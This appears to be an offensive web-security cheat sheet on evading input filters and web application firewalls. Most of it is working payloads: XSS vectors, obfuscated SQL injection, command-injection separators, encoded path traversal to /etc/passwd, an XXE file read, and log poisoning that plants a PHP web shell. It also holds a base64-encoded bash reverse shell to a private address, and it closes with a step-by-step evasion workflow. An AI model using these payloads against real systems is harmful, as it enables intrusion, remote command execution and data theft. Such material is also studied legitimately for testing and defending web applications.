Bypassing filters and Web Application Firewalls (WAF) focuses on altering payloads so they evade detection and still execute successfully in the backend. Filters typically block known malicious patterns, keywords, characters, or sequences. A WAF enforces rulesets that match signatures of common attacks such as <script>, ' OR 1=1, ; ls, ../, and others.
Effective bypassing requires modifying payloads so that they transform back into malicious form after processing, or manipulating the parser so that filters incorrectly interpret the input.

Understanding How Filters Fail

Filters fail due to:

• naive blacklist-based rules

• improper escaping or sanitization

• normalizing input incorrectly

• failing to block encoded versions

• backend and WAF parsing mismatches

• focusing only on exact strings

• missing contextual validation

If any component decodes or processes input differently, attackers exploit the discrepancy.

Types of Filtering Mechanisms

1. Blacklist Filters

Block specific keywords:

• <script>

• UNION

• ;

• ../../

Easy to bypass by encoding or transformation.

2. Whitelist Filters

Allow only specific characters.
More secure, but still break when:

• parser accepts extra characters

• encoding expands into unsafe characters

• backend normalizes input differently

3. WAF Signature Rules

WAFs block:

• SQL keywords

• command separators

• common XSS patterns

• traversal sequences

• known exploit payloads

Payload mutation defeats signature matching.

4. Input Normalization Differences

Attackers exploit differences between:

• browser vs server

• WAF vs backend

• frontend parser vs backend parser

When decoding or trimming happens at different layers.

Core Bypass Techniques

Below are fully practical, deep, real-world WAF and filter bypass methods.

---

Encoding Bypasses

Filters often inspect raw input but not encoded versions.

URL Encoding

%3Cscript%3Ealert(1)%3C/script%3E

Double URL Encoding

%253Cscript%253Ealert(1)%253C/script%253E

HTML Encoding

<script>alert(1)</script>

If backend decodes twice, script executes.

Hex Encoding

SQL payload:

UNION SELECT 0x61646d696e

Base64 Encoding

Command injection:

bash -c "$(echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE= | base64 -d)"

Backend decodes → executes.

---

Case Manipulation Bypasses

WAF matches uppercase “UNION”.
Payload:

UnIoN SeLeCt

Mixed-case breaks signature matching.

---

Separator & Operator Bypasses

SQL Injection

Split keywords:

UN/**/ION SEL/**/ECT

Or:

UNIunionON SELECT

Or:

UN%0AION%0ASELECT

Command Injection

Replace whitespace with:

;id
&whoami
${IFS}ls
$IFS$9ls

Or newline-based:

||id
|id

---

Parser Confusion

Different systems handle strings differently.

Trailing Characters

<script/x>alert(1)</script>

Browsers ignore invalid tag attributes.

Breakouts

"></script><script>alert(1)</script>

Null Byte Bypass

../../../etc/passwd%00.png

Backend stops at null byte, WAF doesn’t.

---

Filter Misdirection

Insert harmless characters that backend strips:

<scri<script>pt>alert(1)</scri</script>pt>

---

HTML & JS Contextual Bypasses

Different contexts accept different payloads.

Scriptless XSS

<svg onload=alert(1)>
<math href="javascript:alert(1)">

Event Handlers

<iframe onload=alert(1)>

Using backticks in JS

`;alert(1);// 

---

SQL WAF Bypass Techniques

Inline Comments

SELECT/**/password/**/FROM/**/users

Keyword Splitting

UN||ION
SEL/**/ECT

Parentheses Bypass

' or (1=1) --

Injection with whitespace alternatives

%0A  
%0D  
%09  
%0C  
%20  

Using Bitwise Operators

' OR 1|1 --

Time-based without SLEEP keyword

' AND IF(1=1, BENCHMARK(50000000,MD5(1)), 0) --

---

Command Injection Bypass Techniques

Using subshells

$(id)
`id`

Using pipes

id|cat
id||cat

Using environment variables

${PATH:0:1}bin${PATH:0:1}sh

---

File Path Bypasses (LFI/RFI)

Directory traversal encoding

..%2f..%2f..%2fetc/passwd

Double encoding:

..%252f..%252f..%252fetc/passwd

Wrappers

php://filter/convert.base64-encode/resource=index.php

Log poisoning bypass:

User-Agent: <?php system($_GET['cmd']); ?>

Load:

/var/log/apache2/access.log

---

JavaScript Prototype Pollution Bypasses

Some WAF rules block __proto__, so attacker uses:

constructor.prototype

Or encoding:

%5F%5Fproto%5F%5F

---

XXE Bypass Techniques

Parameter Entities

<!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]>

Compression-based exfiltration

XXE sometimes passes through GZip encoding.

---

WebSocket WAF Bypass

Most WAFs do not inspect WebSocket frames.

Send payload directly in WebSocket:

{"action":"execute","cmd":"id"}

WAF never sees it.

---

API WAF Bypass

JSON Injection Bypass

{"role": "admin"}

If field is not validated, bypass succeeds.

Nested payloads

{"data": {"data":{"role":"admin"}}}

Array smuggling

{"role":["admin"]}

Backend converts array → string.

---

Frontend Validation Bypass

WAF may rely on frontend restrictions.

• disable JavaScript in browser

• intercept and modify requests in Burp

• use curl or script-based requests

• remove client-side headers

---

Practical Evasion Workflow

Step 1: Identify blocked patterns

Send basic malicious payload and observe:

• blocked characters

• error messages

• server responses

• transformation behavior

Step 2: Test encodings

Try URL, double-URL, Base64, hex.

Step 3: Try breaking WAF regex

Use:

• split keywords

• comments

• uncommon whitespace

• newline injection

• mixed casing

Step 4: Try alternative vectors

Example: SVG instead of <script>.

Step 5: Attempt bypass via alternate methods

Use wrappers, different injection points, or chain multiple encodings.

Step 6: Force normalization

Check if backend decodes twice.

---

Practical Attack Examples

Example 1: XSS blocked on <script>

Try:

<svg/onload=alert(1)>

Or:

<iframe srcdoc="<script>alert(1)</script>">

Or:

"><img src=x onerror=alert(1)>

Example 2: SQLi WAF blocks “UNION”

Try:

UN%0AION
UN/**/ION
UNION SELECT/*payload*/1,2
UNIunionON SELECT

Example 3: Command injection filter blocks ; and &&

Use:

| id
`id`
$(id)
${IFS}id

Example 4: LFI filter blocks “../”

Use:

..%2f
..%252f
..\.\/

Example 5: API blocks dangerous fields

Use nested object smuggling:

{"role":{"admin":true}}

Backend may flatten → role=admin.

---

Intel Dump

• Filters and WAFs block signatures, not logic.

• Encoding, casing, comment injection, and splitting keywords bypass most signatures.

• Payloads mutate with hex, URL, Base64, UTF-7, whitespace alternatives, and broken syntax.

• SQLi bypass uses keyword splitting, inline comments, bitwise operations, and blind techniques.

• XSS bypass uses SVG, event handlers, HTML smuggling, and JS escape sequences.

• Command injection bypass uses pipes, subshells, backticks, and environment variables.

• LFI bypass uses traversal encoding, wrappers, and log poisoning.

• WebSockets bypass WAF entirely because frames are rarely inspected.

• Strong bypassing requires matching parser behavior and exploiting normalization differences.